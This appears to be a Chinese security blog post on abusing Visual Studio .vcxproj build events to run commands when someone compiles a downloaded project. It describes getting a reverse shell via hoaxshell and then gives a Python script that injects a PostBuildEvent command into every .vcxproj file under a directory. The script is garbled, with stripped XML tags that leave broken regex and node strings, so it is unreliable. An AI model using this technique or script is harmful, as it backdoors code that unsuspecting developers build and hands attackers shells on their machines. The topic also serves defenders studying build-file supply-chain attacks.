0x01 漏洞成因

漏洞的形成主要是因为Visual Studio的项目文件（vcxproj）是基于XML格式的，XML文件本身并不包含可执行代码。然而，Visual Studio的XML解析器允许在项目文件中包含一些自定义的命令，这些命令可以在构建项目时被执行。

0x02 漏洞复现

正常情况下使用Visual Studio去编译github上下载的项目

通过修改Visual Studio的项目文件（vcxproj)植入恶意命令

当项目被下载编译时机会执行命令

0x03 漏洞利用

可以直接反弹shell，通过hoaxshell直接生成powershell，并开启监听

将代码插入Visual Studio的项目文件（vcxproj）的XML标签中

直接编译，终端反弹shell

漏洞利用脚本：

1. import argparse
2. import os
3. import re
5. # 解析命令行参数
6. parser = argparse.ArgumentParser(description='Insert PostBuildEvent node into .vcxproj files.')
7. parser.add_argument('-d', '--directory', metavar='directory', type=str, default='.', help='the directory to search for .vcxproj files')
8. parser.add_argument('-c', '--command', metavar='command', type=str, default='calc.exe', help='the command to be executed in the PostBuildEvent node')
9. args = parser.parse_args()
11. # 定义正则表达式，用于匹配.vcxproj文件中的标签
12. property_group_pattern = re.compile(r's*')
14. # 定义插入的节点内容
15. post_build_event_node = 'nn n {command}n nn'.format(command=args.command)
17. # 遍历指定目录下的所有文件和子目录
18. for root, dirs, files in os.walk(args.directory):
19. # 遍历当前目录下的所有文件
20. for file in files:
21. # 如果文件扩展名是.vcxproj，则进行处理
22. if file.endswith('.vcxproj'):
23. file_path = os.path.join(root, file)
24. # 打开文件，读取全部内容
25. with open(file_path, 'r', encoding='utf-8') as f:
26. content = f.read()
27. # 在标签后插入节点
28. new_content = property_group_pattern.sub(post_build_event_node + '\g', content)
29. # 如果文件内容有变化，则写回文件
30. if new_content != content:
31. with open(file_path, 'w', encoding='utf-8') as f:
32. f.write(new_content)